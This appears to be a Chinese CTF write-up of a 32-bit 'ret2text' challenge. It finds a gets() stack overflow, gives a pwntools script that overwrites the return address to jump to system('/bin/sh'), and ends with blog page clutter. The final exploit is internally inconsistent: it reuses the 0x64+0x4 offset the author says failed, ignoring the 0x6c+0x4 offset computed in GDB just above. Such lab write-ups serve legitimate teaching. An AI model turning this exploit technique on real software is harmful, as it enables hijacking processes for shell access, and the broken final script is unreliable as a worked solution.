WIKI|PEN-ret2text-WP

1.检查保护机制

(1)开启堆栈不可执行保护

(2)该文件是32位文件

2.用32位IDA打开该文件

(1)先运行试试看

 

(2)shift+f12查看关键字符串

我们看到有system("/bin/sh")关键字符串

(3)进入main函数看看 

 

看到gets()函数我们就看到溢出点了。S:0x64

 

 我们构造payload

#encoding = utf-8
from pwn import*

context(os = 'linux',arch = 'i386',log_level = 'debug')
content = 1

def main():
	if content == 1:
		p = process('ret2text')
		
	binsh_addr = 0x0804863A
	payload = b'a' *(0x64+0x4) + p32(binsh_addr)
	p.recvuntil("There is something amazing here, do you know anything?\n")
	p.sendline(payload)
	
	p.interactive()
main()

我们发现没有拿到shell权限

(4)我们gdb调试查找s的位置,计算偏移

 

 找到s跳转位置0x080486AE

gdb调试给call下断点

 然后运行

 s位置在0xffffd0ec

s相对于ebp的偏移量为:ebp-s=0xffffd158-0xffffd0ec=0x6c

s相对于返回地址的偏移量为:0x6c+0x4

3.EXP

#encoding = utf-8
from pwn import*

context(os = 'linux',arch = 'i386',log_level = 'debug')
content = 1

def main():
	if content == 1:
		p = process('ret2text')
		
	binsh_addr = 0x0804863A
	payload = b'a' *(0x64+0x4) + p32(binsh_addr)
	p.recvuntil("There is something amazing here, do you know anything?\n")
	p.sendline(payload)
	
	p.interactive()
main()

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值